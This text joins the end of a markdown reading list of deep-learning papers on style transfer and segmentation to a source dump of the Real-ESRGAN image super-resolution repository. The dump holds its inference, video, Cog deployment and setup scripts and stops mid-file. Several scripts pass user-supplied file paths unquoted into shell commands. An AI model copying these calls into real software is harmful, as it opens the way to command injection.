[[html]](https://research.googleblog.com/2015/06/inceptionism-going-deeper-into-neural.html) **(Deep Dream)** :star::star::star::star: **[2]** Gatys, Leon A., Alexander S. Ecker, and Matthias Bethge. "**A neural algorithm of artistic style**." arXiv preprint arXiv:1508.06576 (2015). [[pdf]](http://arxiv.org/pdf/1508.06576) **(Outstanding Work, most successful method currently)** :star::star::star::star::star: **[3]** Zhu, Jun-Yan, et al. "**Generative Visual Manipulation on the Natural Image Manifold**." European Conference on Computer Vision. Springer International Publishing, 2016. [[pdf]](https://arxiv.org/pdf/1609.03552) **(iGAN)** :star::star::star::star: **[4]** Champandard, Alex J. "**Semantic Style Transfer and Turning Two-Bit Doodles into Fine Artworks**." arXiv preprint arXiv:1603.01768 (2016). [[pdf]](http://arxiv.org/pdf/1603.01768) **(Neural Doodle)** :star::star::star::star: **[5]** Zhang, Richard, Phillip Isola, and Alexei A. Efros. "**Colorful Image Colorization**." arXiv preprint arXiv:1603.08511 (2016). [[pdf]](http://arxiv.org/pdf/1603.08511) :star::star::star::star: **[6]** Johnson, Justin, Alexandre Alahi, and Li Fei-Fei. "**Perceptual losses for real-time style transfer and super-resolution**." arXiv preprint arXiv:1603.08155 (2016). [[pdf]](https://arxiv.org/pdf/1603.08155.pdf) :star::star::star::star: **[7]** Vincent Dumoulin, Jonathon Shlens and Manjunath Kudlur. "**A learned representation for artistic style**." arXiv preprint arXiv:1610.07629 (2016). [[pdf]](https://arxiv.org/pdf/1610.07629v1.pdf) :star::star::star::star: **[8]** Gatys, Leon and Ecker, et al."**Controlling Perceptual Factors in Neural Style Transfer**." arXiv preprint arXiv:1611.07865 (2016). [[pdf]](https://arxiv.org/pdf/1611.07865.pdf) **(control style transfer over spatial location,colour information and across spatial scale)**:star::star::star::star: **[9]** Ulyanov, Dmitry and Lebedev, Vadim, et al. "**Texture Networks: Feed-forward Synthesis of Textures and Stylized Images**." arXiv preprint arXiv:1603.03417(2016). [[pdf]](http://arxiv.org/abs/1603.03417) **(texture generation and style transfer)** :star::star::star::star: **[10]** Yijun Li, Ming-Yu Liu ,Xueting Li, Ming-Hsuan Yang,Jan Kautz (NVIDIA). "**A Closed-form Solution to Photorealistic Image Stylization**." arXiv preprint arXiv:1802.06474(2018). [[pdf]](https://arxiv.org/pdf/1802.06474.pdf) **(Very fast and ultra realistic style transfer)** :star::star::star::star: ## 3.8 Object Segmentation **[1]** J. Long, E. Shelhamer, and T. Darrell, “**Fully convolutional networks for semantic segmentation**.” in CVPR, 2015. [[pdf]](https://arxiv.org/pdf/1411.4038v2.pdf) :star::star::star::star::star: **[2]** L.-C. Chen, G. Papandreou, I. Kokkinos, K. Murphy, and A. L. Yuille. "**Semantic image segmentation with deep convolutional nets and fully connected crfs**." In ICLR, 2015. [[pdf]](https://arxiv.org/pdf/1606.00915v1.pdf) :star::star::star::star::star: **[3]** Pinheiro, P.O., Collobert, R., Dollar, P. "**Learning to segment object candidates.**" In: NIPS. 2015. [[pdf]](https://arxiv.org/pdf/1506.06204v2.pdf) :star::star::star::star: **[4]** Dai, J., He, K., Sun, J. "**Instance-aware semantic segmentation via multi-task network cascades**." in CVPR. 2016 [[pdf]](https://arxiv.org/pdf/1512.04412v1.pdf) :star::star::star: **[5]** Dai, J., He, K., Sun, J. "**Instance-sensitive Fully Convolutional Networks**." arXiv preprint arXiv:1603.08678 (2016). [[pdf]](https://arxiv.org/pdf/1603.08678v1.pdf) :star::star::star:
Real-ESRGAN
a4abfb2979a7bbff3f69f58f58ae324608821e27
File: inference_realesrgan.py import argparse import cv2 import glob import os from basicsr.archs.rrdbnet_arch import RRDBNet from basicsr.utils.download_util import load_file_from_url from realesrgan import RealESRGANer from realesrgan.archs.srvgg_arch import SRVGGNetCompact def main(): """Inference demo for Real-ESRGAN. """ parser = argparse.ArgumentParser() parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder') parser.add_argument( '-n', '--model_name', type=str, default='RealESRGAN_x4plus', help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus | ' 'realesr-animevideov3 | realesr-general-x4v3')) parser.add_argument('-o', '--output', type=str, default='results', help='Output folder') parser.add_argument( '-dn', '--denoise_strength', type=float, default=0.5, help=('Denoise strength. 0 for weak denoise (keep noise), 1 for strong denoise ability. ' 'Only used for the realesr-general-x4v3 model')) parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image') parser.add_argument( '--model_path', type=str, default=None, help='[Option] Model path. Usually, you do not need to specify it') parser.add_argument('--suffix', type=str, default='out', help='Suffix of the restored image') parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing') parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding') parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border') parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face') parser.add_argument( '--fp32', action='store_true', help='Use fp32 precision during inference. Default: fp16 (half precision).') parser.add_argument( '--alpha_upsampler', type=str, default='realesrgan', help='The upsampler for the alpha channels. Options: realesrgan | bicubic') parser.add_argument( '--ext', type=str, default='auto', help='Image extension. 
Options: auto | jpg | png, auto means using the same extension as inputs') parser.add_argument( '-g', '--gpu-id', type=int, default=None, help='gpu device to use (default=None) can be 0,1,2 for multi-gpu') args = parser.parse_args() # determine models according to model names args.model_name = args.model_name.split('.')[0] if args.model_name == 'RealESRGAN_x4plus': # x4 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth'] elif args.model_name == 'RealESRNet_x4plus': # x4 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.1/RealESRNet_x4plus.pth'] elif args.model_name == 'RealESRGAN_x4plus_anime_6B': # x4 RRDBNet model with 6 blocks model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth'] elif args.model_name == 'RealESRGAN_x2plus': # x2 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2) netscale = 2 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.1/RealESRGAN_x2plus.pth'] elif args.model_name == 'realesr-animevideov3': # x4 VGG-style model (XS size) model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu') netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-animevideov3.pth'] elif args.model_name == 'realesr-general-x4v3': # x4 VGG-style model (S size) model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=32, upscale=4, act_type='prelu') netscale = 4 file_url = [ 'https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-wdn-x4v3.pth', 'https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-x4v3.pth' ] # determine model paths if args.model_path is not None: model_path = args.model_path else: model_path = os.path.join('weights', args.model_name + '.pth') if not os.path.isfile(model_path): ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) for url in file_url: # model_path will be updated model_path = load_file_from_url( url=url, model_dir=os.path.join(ROOT_DIR, 'weights'), progress=True, file_name=None) # use dni to control the denoise strength dni_weight = None if args.model_name == 'realesr-general-x4v3' and args.denoise_strength != 1: wdn_model_path = model_path.replace('realesr-general-x4v3', 'realesr-general-wdn-x4v3') model_path = [model_path, wdn_model_path] dni_weight = [args.denoise_strength, 1 - args.denoise_strength] # restorer upsampler = RealESRGANer( scale=netscale, model_path=model_path, dni_weight=dni_weight, model=model, tile=args.tile, tile_pad=args.tile_pad, pre_pad=args.pre_pad, half=not args.fp32, gpu_id=args.gpu_id) if args.face_enhance: # Use GFPGAN for face enhancement from gfpgan import GFPGANer face_enhancer = GFPGANer( model_path='https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth', upscale=args.outscale, arch='clean', channel_multiplier=2, bg_upsampler=upsampler) os.makedirs(args.output, exist_ok=True) if os.path.isfile(args.input): paths = [args.input] else: paths = sorted(glob.glob(os.path.join(args.input, '*'))) for 
idx, path in enumerate(paths): imgname, extension = os.path.splitext(os.path.basename(path)) print('Testing', idx, imgname) img = cv2.imread(path, cv2.IMREAD_UNCHANGED) if len(img.shape) == 3 and img.shape[2] == 4: img_mode = 'RGBA' else: img_mode = None try: if args.face_enhance: _, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True) else: output, _ = upsampler.enhance(img, outscale=args.outscale) except RuntimeError as error: print('Error', error) print('If you encounter CUDA out of memory, try to set --tile with a smaller number.') else: if args.ext == 'auto': extension = extension[1:] else: extension = args.ext if img_mode == 'RGBA': # RGBA images should be saved in png format extension = 'png' if args.suffix == '': save_path = os.path.join(args.output, f'{imgname}.{extension}') else: save_path = os.path.join(args.output, f'{imgname}_{args.suffix}.{extension}') cv2.imwrite(save_path, output) if __name__ == '__main__': main() File: inference_realesrgan_video.py import argparse import cv2 import glob import mimetypes import numpy as np import os import shutil import subprocess import torch from basicsr.archs.rrdbnet_arch import RRDBNet from basicsr.utils.download_util import load_file_from_url from os import path as osp from tqdm import tqdm from realesrgan import RealESRGANer from realesrgan.archs.srvgg_arch import SRVGGNetCompact try: import ffmpeg except ImportError: import pip pip.main(['install', '--user', 'ffmpeg-python']) import ffmpeg def get_video_meta_info(video_path): ret = {} probe = ffmpeg.probe(video_path) video_streams = [stream for stream in probe['streams'] if stream['codec_type'] == 'video'] has_audio = any(stream['codec_type'] == 'audio' for stream in probe['streams']) ret['width'] = video_streams[0]['width'] ret['height'] = video_streams[0]['height'] ret['fps'] = eval(video_streams[0]['avg_frame_rate']) ret['audio'] = ffmpeg.input(video_path).audio if has_audio else None ret['nb_frames'] = int(video_streams[0]['nb_frames']) return ret def get_sub_video(args, num_process, process_idx): if num_process == 1: return args.input meta = get_video_meta_info(args.input) duration = int(meta['nb_frames'] / meta['fps']) part_time = duration // num_process print(f'duration: {duration}, part_time: {part_time}') os.makedirs(osp.join(args.output, f'{args.video_name}_inp_tmp_videos'), exist_ok=True) out_path = osp.join(args.output, f'{args.video_name}_inp_tmp_videos', f'{process_idx:03d}.mp4') cmd = [ args.ffmpeg_bin, f'-i {args.input}', '-ss', f'{part_time * process_idx}', f'-to {part_time * (process_idx + 1)}' if process_idx != num_process - 1 else '', '-async 1', out_path, '-y' ] print(' '.join(cmd)) subprocess.call(' '.join(cmd), shell=True) return out_path class Reader: def __init__(self, args, total_workers=1, worker_idx=0): self.args = args input_type = mimetypes.guess_type(args.input)[0] self.input_type = 'folder' if input_type is None else input_type self.paths = [] # for image&folder type self.audio = None self.input_fps = None if self.input_type.startswith('video'): video_path = get_sub_video(args, total_workers, worker_idx) self.stream_reader = ( ffmpeg.input(video_path).output('pipe:', format='rawvideo', pix_fmt='bgr24', loglevel='error').run_async( pipe_stdin=True, pipe_stdout=True, cmd=args.ffmpeg_bin)) meta = get_video_meta_info(video_path) self.width = meta['width'] self.height = meta['height'] self.input_fps = meta['fps'] self.audio = meta['audio'] self.nb_frames = meta['nb_frames'] else: if 
self.input_type.startswith('image'): self.paths = [args.input] else: paths = sorted(glob.glob(os.path.join(args.input, '*'))) tot_frames = len(paths) num_frame_per_worker = tot_frames // total_workers + (1 if tot_frames % total_workers else 0) self.paths = paths[num_frame_per_worker * worker_idx:num_frame_per_worker * (worker_idx + 1)] self.nb_frames = len(self.paths) assert self.nb_frames > 0, 'empty folder' from PIL import Image tmp_img = Image.open(self.paths[0]) self.width, self.height = tmp_img.size self.idx = 0 def get_resolution(self): return self.height, self.width def get_fps(self): if self.args.fps is not None: return self.args.fps elif self.input_fps is not None: return self.input_fps return 24 def get_audio(self): return self.audio def __len__(self): return self.nb_frames def get_frame_from_stream(self): img_bytes = self.stream_reader.stdout.read(self.width * self.height * 3) # 3 bytes for one pixel if not img_bytes: return None img = np.frombuffer(img_bytes, np.uint8).reshape([self.height, self.width, 3]) return img def get_frame_from_list(self): if self.idx >= self.nb_frames: return None img = cv2.imread(self.paths[self.idx]) self.idx += 1 return img def get_frame(self): if self.input_type.startswith('video'): return self.get_frame_from_stream() else: return self.get_frame_from_list() def close(self): if self.input_type.startswith('video'): self.stream_reader.stdin.close() self.stream_reader.wait() class Writer: def __init__(self, args, audio, height, width, video_save_path, fps): out_width, out_height = int(width * args.outscale), int(height * args.outscale) if out_height > 2160: print('You are generating video that is larger than 4K, which will be very slow due to IO speed.', 'We highly recommend to decrease the outscale(aka, -s).') if audio is not None: self.stream_writer = ( ffmpeg.input('pipe:', format='rawvideo', pix_fmt='bgr24', s=f'{out_width}x{out_height}', framerate=fps).output( audio, video_save_path, pix_fmt='yuv420p', vcodec='libx264', loglevel='error', acodec='copy').overwrite_output().run_async( pipe_stdin=True, pipe_stdout=True, cmd=args.ffmpeg_bin)) else: self.stream_writer = ( ffmpeg.input('pipe:', format='rawvideo', pix_fmt='bgr24', s=f'{out_width}x{out_height}', framerate=fps).output( video_save_path, pix_fmt='yuv420p', vcodec='libx264', loglevel='error').overwrite_output().run_async( pipe_stdin=True, pipe_stdout=True, cmd=args.ffmpeg_bin)) def write_frame(self, frame): frame = frame.astype(np.uint8).tobytes() self.stream_writer.stdin.write(frame) def close(self): self.stream_writer.stdin.close() self.stream_writer.wait() def inference_video(args, video_save_path, device=None, total_workers=1, worker_idx=0): # ---------------------- determine models according to model names ---------------------- # args.model_name = args.model_name.split('.pth')[0] if args.model_name == 'RealESRGAN_x4plus': # x4 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth'] elif args.model_name == 'RealESRNet_x4plus': # x4 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.1/RealESRNet_x4plus.pth'] elif args.model_name == 'RealESRGAN_x4plus_anime_6B': # x4 RRDBNet model with 6 blocks model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, 
scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth'] elif args.model_name == 'RealESRGAN_x2plus': # x2 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2) netscale = 2 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.1/RealESRGAN_x2plus.pth'] elif args.model_name == 'realesr-animevideov3': # x4 VGG-style model (XS size) model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu') netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-animevideov3.pth'] elif args.model_name == 'realesr-general-x4v3': # x4 VGG-style model (S size) model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=32, upscale=4, act_type='prelu') netscale = 4 file_url = [ 'https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-wdn-x4v3.pth', 'https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-x4v3.pth' ] # ---------------------- determine model paths ---------------------- # model_path = os.path.join('weights', args.model_name + '.pth') if not os.path.isfile(model_path): ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) for url in file_url: # model_path will be updated model_path = load_file_from_url( url=url, model_dir=os.path.join(ROOT_DIR, 'weights'), progress=True, file_name=None) # use dni to control the denoise strength dni_weight = None if args.model_name == 'realesr-general-x4v3' and args.denoise_strength != 1: wdn_model_path = model_path.replace('realesr-general-x4v3', 'realesr-general-wdn-x4v3') model_path = [model_path, wdn_model_path] dni_weight = [args.denoise_strength, 1 - args.denoise_strength] # restorer upsampler = RealESRGANer( scale=netscale, model_path=model_path, dni_weight=dni_weight, model=model, tile=args.tile, tile_pad=args.tile_pad, pre_pad=args.pre_pad, half=not args.fp32, device=device, ) if 'anime' in args.model_name and args.face_enhance: print('face_enhance is not supported in anime models, we turned this option off for you. 
' 'if you insist on turning it on, please manually comment the relevant lines of code.') args.face_enhance = False if args.face_enhance: # Use GFPGAN for face enhancement from gfpgan import GFPGANer face_enhancer = GFPGANer( model_path='https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth', upscale=args.outscale, arch='clean', channel_multiplier=2, bg_upsampler=upsampler) # TODO support custom device else: face_enhancer = None reader = Reader(args, total_workers, worker_idx) audio = reader.get_audio() height, width = reader.get_resolution() fps = reader.get_fps() writer = Writer(args, audio, height, width, video_save_path, fps) pbar = tqdm(total=len(reader), unit='frame', desc='inference') while True: img = reader.get_frame() if img is None: break try: if args.face_enhance: _, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True) else: output, _ = upsampler.enhance(img, outscale=args.outscale) except RuntimeError as error: print('Error', error) print('If you encounter CUDA out of memory, try to set --tile with a smaller number.') else: writer.write_frame(output) torch.cuda.synchronize(device) pbar.update(1) reader.close() writer.close() def run(args): args.video_name = osp.splitext(os.path.basename(args.input))[0] video_save_path = osp.join(args.output, f'{args.video_name}_{args.suffix}.mp4') if args.extract_frame_first: tmp_frames_folder = osp.join(args.output, f'{args.video_name}_inp_tmp_frames') os.makedirs(tmp_frames_folder, exist_ok=True) os.system(f'ffmpeg -i {args.input} -qscale:v 1 -qmin 1 -qmax 1 -vsync 0 {tmp_frames_folder}/frame%08d.png') args.input = tmp_frames_folder num_gpus = torch.cuda.device_count() num_process = num_gpus * args.num_process_per_gpu if num_process == 1: inference_video(args, video_save_path) return ctx = torch.multiprocessing.get_context('spawn') pool = ctx.Pool(num_process) os.makedirs(osp.join(args.output, f'{args.video_name}_out_tmp_videos'), exist_ok=True) pbar = tqdm(total=num_process, unit='sub_video', desc='inference') for i in range(num_process): sub_video_save_path = osp.join(args.output, f'{args.video_name}_out_tmp_videos', f'{i:03d}.mp4') pool.apply_async( inference_video, args=(args, sub_video_save_path, torch.device(i % num_gpus), num_process, i), callback=lambda arg: pbar.update(1)) pool.close() pool.join() # combine sub videos # prepare vidlist.txt with open(f'{args.output}/{args.video_name}_vidlist.txt', 'w') as f: for i in range(num_process): f.write(f'file \'{args.video_name}_out_tmp_videos/{i:03d}.mp4\'\n') cmd = [ args.ffmpeg_bin, '-f', 'concat', '-safe', '0', '-i', f'{args.output}/{args.video_name}_vidlist.txt', '-c', 'copy', f'{video_save_path}' ] print(' '.join(cmd)) subprocess.call(cmd) shutil.rmtree(osp.join(args.output, f'{args.video_name}_out_tmp_videos')) if osp.exists(osp.join(args.output, f'{args.video_name}_inp_tmp_videos')): shutil.rmtree(osp.join(args.output, f'{args.video_name}_inp_tmp_videos')) os.remove(f'{args.output}/{args.video_name}_vidlist.txt') def main(): """Inference demo for Real-ESRGAN. It mainly for restoring anime videos. 
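    A minimal usage sketch (illustrative only; the input path is an assumption, while
    the flags are the argparse options defined further down in this file):

        python inference_realesrgan_video.py -i inputs/video.mp4 -n realesr-animevideov3 -s 2 --suffix outx2

    The restored video is written to <output>/<video_name>_<suffix>.mp4.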
""" parser = argparse.ArgumentParser() parser.add_argument('-i', '--input', type=str, default='inputs', help='Input video, image or folder') parser.add_argument( '-n', '--model_name', type=str, default='realesr-animevideov3', help=('Model names: realesr-animevideov3 | RealESRGAN_x4plus_anime_6B | RealESRGAN_x4plus | RealESRNet_x4plus |' ' RealESRGAN_x2plus | realesr-general-x4v3' 'Default:realesr-animevideov3')) parser.add_argument('-o', '--output', type=str, default='results', help='Output folder') parser.add_argument( '-dn', '--denoise_strength', type=float, default=0.5, help=('Denoise strength. 0 for weak denoise (keep noise), 1 for strong denoise ability. ' 'Only used for the realesr-general-x4v3 model')) parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image') parser.add_argument('--suffix', type=str, default='out', help='Suffix of the restored video') parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing') parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding') parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border') parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face') parser.add_argument( '--fp32', action='store_true', help='Use fp32 precision during inference. Default: fp16 (half precision).') parser.add_argument('--fps', type=float, default=None, help='FPS of the output video') parser.add_argument('--ffmpeg_bin', type=str, default='ffmpeg', help='The path to ffmpeg') parser.add_argument('--extract_frame_first', action='store_true') parser.add_argument('--num_process_per_gpu', type=int, default=1) parser.add_argument( '--alpha_upsampler', type=str, default='realesrgan', help='The upsampler for the alpha channels. Options: realesrgan | bicubic') parser.add_argument( '--ext', type=str, default='auto', help='Image extension. 
Options: auto | jpg | png, auto means using the same extension as inputs') args = parser.parse_args() args.input = args.input.rstrip('/').rstrip('\\') os.makedirs(args.output, exist_ok=True) if mimetypes.guess_type(args.input)[0] is not None and mimetypes.guess_type(args.input)[0].startswith('video'): is_video = True else: is_video = False if is_video and args.input.endswith('.flv'): mp4_path = args.input.replace('.flv', '.mp4') os.system(f'ffmpeg -i {args.input} -codec copy {mp4_path}') args.input = mp4_path if args.extract_frame_first and not is_video: args.extract_frame_first = False run(args) if args.extract_frame_first: tmp_frames_folder = osp.join(args.output, f'{args.video_name}_inp_tmp_frames') shutil.rmtree(tmp_frames_folder) if __name__ == '__main__': main() File: cog_predict.py # flake8: noqa # This file is used for deploying replicate models # running: cog predict -i img=@inputs/00017_gray.png -i version='General - v3' -i scale=2 -i face_enhance=True -i tile=0 # push: cog push r8.im/xinntao/realesrgan import os os.system('pip install gfpgan') os.system('python setup.py develop') import cv2 import shutil import tempfile import torch from basicsr.archs.rrdbnet_arch import RRDBNet from basicsr.archs.srvgg_arch import SRVGGNetCompact from realesrgan.utils import RealESRGANer try: from cog import BasePredictor, Input, Path from gfpgan import GFPGANer except Exception: print('please install cog and realesrgan package') class Predictor(BasePredictor): def setup(self): os.makedirs('output', exist_ok=True) # download weights if not os.path.exists('weights/realesr-general-x4v3.pth'): os.system( 'wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-x4v3.pth -P ./weights' ) if not os.path.exists('weights/GFPGANv1.4.pth'): os.system('wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.4.pth -P ./weights') if not os.path.exists('weights/RealESRGAN_x4plus.pth'): os.system( 'wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth -P ./weights' ) if not os.path.exists('weights/RealESRGAN_x4plus_anime_6B.pth'): os.system( 'wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth -P ./weights' ) if not os.path.exists('weights/realesr-animevideov3.pth'): os.system( 'wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-animevideov3.pth -P ./weights' ) def choose_model(self, scale, version, tile=0): half = True if torch.cuda.is_available() else False if version == 'General - RealESRGANplus': model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) model_path = 'weights/RealESRGAN_x4plus.pth' self.upsampler = RealESRGANer( scale=4, model_path=model_path, model=model, tile=tile, tile_pad=10, pre_pad=0, half=half) elif version == 'General - v3': model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=32, upscale=4, act_type='prelu') model_path = 'weights/realesr-general-x4v3.pth' self.upsampler = RealESRGANer( scale=4, model_path=model_path, model=model, tile=tile, tile_pad=10, pre_pad=0, half=half) elif version == 'Anime - anime6B': model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4) model_path = 'weights/RealESRGAN_x4plus_anime_6B.pth' self.upsampler = RealESRGANer( scale=4, model_path=model_path, model=model, tile=tile, tile_pad=10, pre_pad=0, half=half) elif version == 'AnimeVideo - v3': model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, 
num_feat=64, num_conv=16, upscale=4, act_type='prelu') model_path = 'weights/realesr-animevideov3.pth' self.upsampler = RealESRGANer( scale=4, model_path=model_path, model=model, tile=tile, tile_pad=10, pre_pad=0, half=half) self.face_enhancer = GFPGANer( model_path='weights/GFPGANv1.4.pth', upscale=scale, arch='clean', channel_multiplier=2, bg_upsampler=self.upsampler) def predict( self, img: Path = Input(description='Input'), version: str = Input( description='RealESRGAN version. Please see [Readme] below for more descriptions', choices=['General - RealESRGANplus', 'General - v3', 'Anime - anime6B', 'AnimeVideo - v3'], default='General - v3'), scale: float = Input(description='Rescaling factor', default=2), face_enhance: bool = Input( description='Enhance faces with GFPGAN. Note that it does not work for anime images/vidoes', default=False), tile: int = Input( description= 'Tile size. Default is 0, that is no tile. When encountering the out-of-GPU-memory issue, please specify it, e.g., 400 or 200', default=0) ) -> Path: if tile <= 100 or tile is None: tile = 0 print(f'img: {img}. version: {version}. scale: {scale}. face_enhance: {face_enhance}. tile: {tile}.') try: extension = os.path.splitext(os.path.basename(str(img)))[1] img = cv2.imread(str(img), cv2.IMREAD_UNCHANGED) if len(img.shape) == 3 and img.shape[2] == 4: img_mode = 'RGBA' elif len(img.shape) == 2: img_mode = None img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) else: img_mode = None h, w = img.shape[0:2] if h < 300: img = cv2.resize(img, (w * 2, h * 2), interpolation=cv2.INTER_LANCZOS4) self.choose_model(scale, version, tile) try: if face_enhance: _, _, output = self.face_enhancer.enhance( img, has_aligned=False, only_center_face=False, paste_back=True) else: output, _ = self.upsampler.enhance(img, outscale=scale) except RuntimeError as error: print('Error', error) print('If you encounter CUDA out of memory, try to set "tile" to a smaller size, e.g., 400.') if img_mode == 'RGBA': # RGBA images should be saved in png format extension = 'png' # save_path = f'output/out.{extension}' # cv2.imwrite(save_path, output) out_path = Path(tempfile.mkdtemp()) / f'out.{extension}' cv2.imwrite(str(out_path), output) except Exception as error: print('global exception: ', error) finally: clean_folder('output') return out_path def clean_folder(folder): for filename in os.listdir(folder): file_path = os.path.join(folder, filename) try: if os.path.isfile(file_path) or os.path.islink(file_path): os.unlink(file_path) elif os.path.isdir(file_path): shutil.rmtree(file_path) except Exception as e: print(f'Failed to delete {file_path}. 
Reason: {e}') File: setup.py #!/usr/bin/env python from setuptools import find_packages, setup import os import subprocess import time version_file = 'realesrgan/version.py' def readme(): with open('README.md', encoding='utf-8') as f: content = f.read() return content def get_git_hash(): def _minimal_ext_cmd(cmd): # construct minimal environment env = {} for k in ['SYSTEMROOT', 'PATH', 'HOME']: v = os.environ.get(k) if v is not None: env[k] = v # LANGUAGE is used on win32 env['LANGUAGE'] = 'C' env['LANG'] = 'C' env['LC_ALL'] = 'C' out = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env).communicate()[0] return out try: out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD']) sha = out.strip().decode('ascii') except OSError: sha = 'unknown' return sha def get_hash(): if os.path.exists('.git'): sha = get_git_hash()[:7] else: sha = 'unknown' return sha def write_version_py(): content = """# GENERATED VERSION FILE # TIME: {} __version__ = '{}' __gitsha__ = '{}' version_info = ({}) """ sha = get_hash() with open('VERSION', 'r') as f: SHORT_VERSION = f.read().strip() VERSION_INFO = ', '.join([x if x.isdigit() else f'"{x}"' for x in SHORT_VERSION.split('.')]) version_file_str = content.format(time.asctime(), SHORT_VERSION, sha, VERSION_INFO) with open(version_file, 'w') as f: f.write(version_file_str) def get_version(): with open(version_file, 'r') as f: exec(compile(f.read(), version_file, 'exec')) return locals()['__version__'] def get_requirements(filename='requirements.txt'): here = os.path.dirname(os.path.realpath(__file__)) with open(os.path.join(here, filename), 'r') as f: requires = [line.replace('\n', '') for line in f.readlines()] return requires if __name__ == '__main__': write_version_py() setup( name='realesrgan', version=get_version(), description='Real-ESRGAN aims at developing Practical Algorithms for General Image Restoration', long_description=readme(), long_description_content_type='text/markdown', author='Xintao Wang', author_email='[email protected]', keywords='computer vision, pytorch, image restoration, super-resolution, esrgan, real-esrgan', url='https://github.com/xinntao/Real-ESRGAN', include_package_data=True, packages=find_packages(exclude=('options', 'datasets', 'experiments', 'results', 'tb_logger', 'wandb')), classifiers=[ 'Development Status :: 4 - Beta', 'License :: OSI Approved :: Apache Software License', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', ], license='BSD-3-Clause License', setup_requires=['cython', 'numpy'], install_requires=get_requirements(), zip_safe=False) File: scripts/generate_meta_info_pairdata.py import argparse import glob import os def main(args): txt_file = open(args.meta_info, 'w') # sca images img_paths_gt = sorted(glob.glob(os.path.join(args.input[0], '*'))) img_paths_lq = sorted(glob.glob(os.path.join(args.input[1], '*'))) assert len(img_paths_gt) == len(img_paths_lq), ('GT folder and LQ folder should have the same length, but got ' f'{len(img_paths_gt)} and {len(img_paths_lq)}.') for img_path_gt, img_path_lq in zip(img_paths_gt, img_paths_lq): # get the relative paths img_name_gt = 